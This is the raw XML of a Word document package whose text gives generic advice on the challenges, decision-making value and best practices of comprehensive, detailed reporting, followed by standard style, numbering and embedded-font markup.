can be challenging. What is comprehensive and detailed to one group may be overwhelming to another.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Resource Limitations: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Limited resources, such as access to data, expertise, or tools, can hinder the production of a truly comprehensive report.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Data Accuracy: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Ensuring the accuracy and reliability of the data used in the report can be challenging, especially when dealing with data from multiple sources.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Information Overload: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Providing too much information can overwhelm readers and detract from the report's effectiveness. Striking the right balance is essential.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Maintaining Objectivity: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Maintaining objectivity in reporting, especially in research or assessments, can be challenging when there are potential biases or vested interests.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Consistency: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Maintaining consistent formatting, terminology, and style throughout a lengthy report can be challenging, but it's crucial for readability.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Translation and Accessibility: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your report is intended for a global or diverse audience, translating it into multiple languages or ensuring accessibility for people with disabilities can be a challenge.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Changing Data or Findings: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 dynamic fields or situations, findings may change after the report is published, leading to the need for updates or clarifications.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Stakeholder Communication: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Effectively communicating the report's findings and recommendations to various stakeholders, each with different interests and needs, can be challenging.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Integration with Existing Systems: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 business or technical reporting, integrating new findings or recommendations with existing systems, processes, or strategies can be a challenge.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Data Security and Privacy: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Ensuring the security and privacy of sensitive data used in the report can pose challenges, particularly when reporting on cybersecurity or personal information.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Formatting and Design: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Creating an engaging and visually appealing report can be a challenge, especially for individuals or organizations with limited design expertise.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Overcoming Biases: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Recognizing and addressing any cognitive biases, confirmation biases, or preconceived notions that may affect the report's objectivity is essential.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Resource Allocation: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Deciding how many resources (financial, human, time) should be allocated to produce a comprehensive report can be a challenging decision.</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Overcoming these challenges often requires careful planning, effective time management, collaboration with experts or peers, and a strong understanding of the report's objectives and audience. Additionally, the ability to adapt to changing circumstances and respond to feedback is key to successful implementation of comprehensive and detailed reporting.</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Comprehensive and detailed reporting plays a significant role in influencing decision-making in various fields. Its impact is profound because it provides decision-makers with the information and insights they need to make informed, strategic, and effective choices. Here are several ways in which comprehensive and detailed reporting affects decision-making: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Informed Decision-Making: Comprehensive reports provide decision-makers with a comprehensive view of the situation, ensuring that decisions are based on a thorough understanding of the subject matter.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Clarity and Transparency: Detailed reporting promotes transparency by clearly presenting the facts, evidence, and reasoning behind decisions. This transparency builds trust and accountability.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Risk Assessment: Comprehensive reports help decision-makers assess and understand the risks associated with various options. They provide insight into potential vulnerabilities and pitfalls.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Identification of Opportunities: Detailed reports not only highlight challenges and risks but also identify opportunities for growth, improvement, or innovation. Decision-makers can leverage these opportunities to achieve strategic goals.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Performance Evaluation: Reports can include data and metrics for evaluating past performance. Decision-makers can use this information to make improvements and set benchmarks for the future.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Resource Allocation: Comprehensive reports aid in the allocation of resources by providing a clear understanding of the needs and priorities of different projects or areas.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Prioritization: Decision-makers can use detailed reports to prioritize actions, projects, or investments based on their strategic significance and potential impact.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Long-Term Planning: Comprehensive reporting often includes historical data and trends, helping decision-makers make decisions that align with long-term goals and sustainability.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Accountability: Comprehensive reports hold individuals and organizations accountable for their actions and decisions by providing a record of what was done and why.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Policy Development: Reports can serve as the basis for the development of policies, guidelines, or procedures that address specific issues or opportunities.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Conflict Resolution: Detailed reporting can help mediate and resolve conflicts by providing objective information and context to all parties involved.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Cost-Benefit Analysis: Decision-makers can use comprehensive reports to conduct cost-benefit analyses to determine the best course of action based on the expected returns.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Compliance and Regulation: In regulated industries, detailed reporting helps organizations adhere to legal and regulatory requirements. It ensures that actions are in line with industry standards.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Public Relations: Comprehensive reports can be used to communicate with the public, stakeholders, or shareholders, demonstrating a commitment to transparency and ethical conduct.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Complex Problem Solving: For complex issues, detailed reporting breaks down the problem into manageable components, making it easier to identify potential solutions.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Research and Development: In scientific and technical fields, comprehensive reporting is essential for documenting findings, experiments, and innovations, which can be used as a basis for further study or innovation.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Learning and Improvement: Decision-makers can use detailed reports as learning materials for themselves or their teams. They provide insights into past actions and their outcomes, which can inform future decisions and actions.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 summary, comprehensive and detailed reporting enhances decision-making by providing the information, context, and evidence necessary for informed choices. It helps decision-makers assess risks, identify opportunities, allocate resources effectively, and hold themselves accountable for their actions. The impact of such reporting extends to a wide range of fields, from business and governance to research and policy development.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Creating comprehensive and detailed reports is essential for effectively conveying information and influencing decisions. To ensure your reports meet these criteria, consider the following best practices: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Understand Your Audience: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Know who will be reading the report and tailor the content, style, and level of technical detail to match their knowledge and interests.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Define Clear Objectives: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Determine the purpose and objectives of the report. Clearly articulate what you want to achieve with the report.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Plan and Organize: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Create a detailed outline or structure for your report. This helps ensure that information is logically arranged and that you cover all key points.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 Logical Flow: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Present information in a logical sequence. Start with an introduction, followed by the main body, and conclude with summaries, recommendations, or conclusions.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Clarity and Simplicity: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clear and straightforward language. Avoid jargon or technical terms when they aren't necessary. Make complex ideas accessible to a broader audience.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Visual Aids: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Incorporate charts, graphs, tables, and images to illustrate key points. Visual aids can make complex data more understandable.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Conciseness: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Be concise and avoid unnecessary wordiness. Make every sentence and paragraph count. Shorter sentences are often more impactful.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Evidence-Based:</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Support your claims and recommendations with evidence. Use data, statistics, quotes, and citations to add credibility to your report.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Active Voice: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Write in the active voice to make your writing more engaging and direct. Passive voice can make your writing less clear.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Emphasize Key Findings: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Highlight your main findings or recommendations early in the report to grab the reader's attention.</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Balance Detail and Brevity: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sufficient detail to support your arguments but avoid overwhelming the reader with excessive information. Be selective and focus on what's most important.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Proofreading and Editing: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Carefully proofread and edit your report for grammar, spelling, and formatting errors. A well-polished report is more credible and professional.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Consistent Formatting:</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 consistent formatting style throughout the report. This includes fonts, headers, and page layouts. Consistency adds professionalism.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White Space:</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 ample white space to break up text and make the report more visually appealing. Proper spacing and margins help readability.</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Cite Sources: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Properly cite all sources, references, and quotations. This adds credibility and integrity to your report.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Appendices for Detail:</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you need to include additional information, place it in appendices. This allows you to provide extra detail without cluttering the main report.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Provide Context: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Make sure the reader understands the context of the report. Explain the background, objectives, and why the report is relevant.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Peer Review:</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If possible, have colleagues or experts in the field review your report before finalizing it. Peer feedback can help identify improvements.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Feedback Mechanism:</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Encourage readers to provide feedback or ask questions. This shows that you value their input and helps address any concerns.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Conclusion and Action Items:</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Summarize your findings and provide clear action items or recommendations. Make it evident what the reader should do next.</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Engage the Reader:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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Consider adding a personal touch, anecdotes, or stories to engage the reader emotionally and make your report more memorable.</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By following these best practices, you can create comprehensive and detailed reports that are informative, actionable, and well-structured, catering to the needs of your intended audience.</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Bdr/>
        <w:jc w:val="cente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Thank you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shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        <w:tabs>
          <w:tab w:pos="360" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="false"/>
        <w:spacing w:before="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="374151"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="435" w:val="left" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId12" w:type="default"/>
      <w:footerReference r:id="rId13"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7c87c9a-8472-46c7-a802-06253b69229e" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Carlito Bold">
    <w:embedBold r:id="rId91b51fdd-30eb-4eca-a7aa-c030d1d99794" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Carlito Regular">
    <w:embedRegular r:id="rId3855c87c-8ab8-4af9-b3a6-20470939dd98" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Liberation Serif Regular">
    <w:embedRegular r:id="rId32e255ff-0d86-4ba9-b3d5-232dcb6c9f6c" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Arimo Regular">
    <w:embedRegular r:id="rIde663a6a4-572d-4003-8477-208187f39962" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Arimo Bold">
    <w:embedBold r:id="rIdcaf45d9d-6ac3-4281-9d94-a42913d37b32" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="TeXGyreCursor Regular">
    <w:embedRegular r:id="rIde79e029a-2147-4a26-bc1f-e5bbff072cc8" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Open Sans Medium">
    <w:embedRegular/>
  </w:font>
  <w:font w:name="Open Sans Semibold">
    <w:embedRegular r:id="rIdeb6c9180-f6f6-41fd-b578-a94d0e214a14" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Open Sans Regular">
    <w:embedRegular r:id="rId4902eba9-c18c-4418-8244-a39763fe2523" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Open Sans Light">
    <w:embedRegular r:id="rId39cea670-1820-4d40-9e43-6f57677bf1ce" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Open Sans Bold">
    <w:embedBold r:id="rId6e8c3fb7-06af-4bbc-a632-5e5720c734bd" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Roboto Bold">
    <w:embedBold r:id="rId6a701713-0f61-4a24-ba75-3f787569a2ff" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Source Sans Pro Semibold">
    <w:embedRegular r:id="rIdf62024ac-dcc5-45db-bbb0-929f70a86508" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Source Sans Pro Regular">
    <w:embedRegular r:id="rIdb8a48746-de52-4bc1-ae77-6027147b805a" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Source Sans Pro Bold">
    <w:embedBold r:id="rId5e042ff0-9b2b-43b8-9374-0f1e54090fab" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
</w:fonts>
</file>

<file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
<w:ftr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:p>
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
  </w:p>
  <w:p>
    <w:pPr>
      <w:rP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066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50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77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6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91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91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42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23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3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20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98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28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95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69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68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86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33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73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8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72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56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0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07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79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54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78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33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6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06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9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52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14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15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92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77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03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86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12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35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71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28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89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18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95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26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5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20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46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90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106622"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="915091"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="507767"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="76661"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="169188"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="279109"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="834291"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="832365"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="73346"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="252038"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="689896"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="712874"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="539562"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="476956"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="566854"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="558613"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="713382"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="777350"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="95806"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="907272"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="695694"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="84034"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="480743"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="897941"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="385429"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="267867"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="673330"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="10626"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="590609"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="384984"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="155283"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="151450"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="641503"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="519276"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="677715"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="970376"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="208618"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="111287"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="883562"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="507150"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="432835"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="768977"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="991825"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="799509"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="882617"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="46523"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="782020"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="864683"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="6686"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="69908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i w:val="true"/>
      <w:color w:themeColor="text2" w:val="26543D"/>
      <w:sz w:val="21"/>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i w:val="true"/>
      <w:color w:themeColor="text1" w:val="000000"/>
      <w:sz w:val="28"/>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i w:val="true"/>
      <w:color w:themeColor="text2" w:val="26543D"/>
      <w:sz w:val="21"/>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i w:val="true"/>
      <w:color w:val="404040"/>
      <w:sz w:val="24"/>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i w:val="true"/>
      <w:color w:themeColor="text1" w:val="000000"/>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val="true"/>
      <w:color w:themeColor="text1" w:themeTint="3F" w:val="BFBFBF"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:i w:val="true"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:b w:val="true"/>
      <w:i w:val="true"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
      <w:b w:val="true"/>
      <w:color w:themeColor="accent1" w:themeShade="BF" w:val="1E58BF"/>
      <w:spacing w:val="-10"/>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color w:themeColor="text1" w:themeTint="3F" w:val="BFBFB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val="true"/>
      <w:smallCaps w:val="true"/>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val="true"/>
      <w:smallCaps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i w:val="true"/>
      <w:color w:themeColor="accent1" w:themeShade="7F" w:val="143B7F"/>
      <w:sz w:val="21"/>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53835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1903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7526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964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076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2786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6293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54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2604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8675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7712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9365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764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2399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1847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0036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9788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2006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4559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6383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160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9001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607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0096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1366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9073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1366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3523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36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1511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7972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2e255ff-0d86-4ba9-b3d5-232dcb6c9f6c" Target="fonts/liberationserifregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rId3855c87c-8ab8-4af9-b3a6-20470939dd98" Target="fonts/carlitoregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rId39cea670-1820-4d40-9e43-6f57677bf1ce" Target="fonts/opensanslightregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rId4902eba9-c18c-4418-8244-a39763fe2523" Target="fonts/opensansregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rId5e042ff0-9b2b-43b8-9374-0f1e54090fab" Target="fonts/sourcesansprobold.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rId6a701713-0f61-4a24-ba75-3f787569a2ff" Target="fonts/robotobold.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rId6e8c3fb7-06af-4bbc-a632-5e5720c734bd" Target="fonts/opensansbold.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rId87c87c9a-8472-46c7-a802-06253b69229e" Target="fonts/robotoregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rId91b51fdd-30eb-4eca-a7aa-c030d1d99794" Target="fonts/carlitobold.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rIdb8a48746-de52-4bc1-ae77-6027147b805a" Target="fonts/sourcesansproregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rIdcaf45d9d-6ac3-4281-9d94-a42913d37b32" Target="fonts/arimobold.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rIde663a6a4-572d-4003-8477-208187f39962" Target="fonts/arimoregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rIde79e029a-2147-4a26-bc1f-e5bbff072cc8" Target="fonts/texgyrecursorregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rIdeb6c9180-f6f6-41fd-b578-a94d0e214a14" Target="fonts/opensanssemiboldregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
    <Relationship Id="rIdf62024ac-dcc5-45db-bbb0-929f70a86508" Target="fonts/sourcesansprosemiboldregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/>
</Relationships>

</file>

<file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="169756182684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2023-10-17T16:57:06Z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